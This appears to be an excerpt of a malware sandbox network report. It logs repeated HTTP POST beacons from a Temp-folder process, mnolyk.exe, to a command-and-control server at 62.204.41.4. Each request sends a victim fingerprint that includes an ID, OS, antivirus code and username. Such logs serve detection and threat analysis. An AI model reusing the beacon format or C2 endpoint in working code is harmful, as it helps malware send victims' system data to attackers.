Feb 7, 2023 19:59:15.563616991 CET	697	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:15.630712986 CET	698	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
466	192.168.2.5	50178	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:15.810185909 CET	698	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:15.872658968 CET	699	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
467	192.168.2.5	50179	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:16.043395996 CET	699	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:16.108273983 CET	700	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
468	192.168.2.5	50180	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:16.281335115 CET	700	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:16.345597029 CET	701	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
469	192.168.2.5	50181	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:16.514939070 CET	701	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:16.580110073 CET	702	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.5	49747	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:17.384762049 CET	175	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:17.446343899 CET	175	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
470	192.168.2.5	50182	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:16.745810032 CET	702	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:16.807717085 CET	703	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
471	192.168.2.5	50183	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:16.984626055 CET	703	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:17.050165892 CET	704	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
472	192.168.2.5	50184	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:17.230712891 CET	704	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:17.293034077 CET	705	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
473	192.168.2.5	50185	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:17.468502045 CET	705	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:17.531395912 CET	706	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
474	192.168.2.5	50186	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:17.709490061 CET	706	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:17.773711920 CET	707	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
475	192.168.2.5	50187	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:17.949465036 CET	707	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:18.012347937 CET	708	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
476	192.168.2.5	50188	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:18.207900047 CET	709	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:18.273184061 CET	709	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
477	192.168.2.5	50189	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:18.468588114 CET	710	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:18.533440113 CET	710	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
478	192.168.2.5	50190	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:18.716316938 CET	711	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:18.781754017 CET	711	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
479	192.168.2.5	50191	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:18.961060047 CET	712	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:19.028016090 CET	712	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.5	49748	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:17.627779961 CET	176	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:17.691453934 CET	176	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
480	192.168.2.5	50192	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:19.202749968 CET	713	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:19.267288923 CET	714	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
481	192.168.2.5	50194	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:19.434056044 CET	726	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:19.495491982 CET	726	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
482	192.168.2.5	50195	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:19.673213005 CET	727	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:19.736771107 CET	727	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
483	192.168.2.5	50196	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:19.903167009 CET	728	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:19.967077017 CET	728	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
484	192.168.2.5	50197	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:20.137779951 CET	729	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:20.202398062 CET	729	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
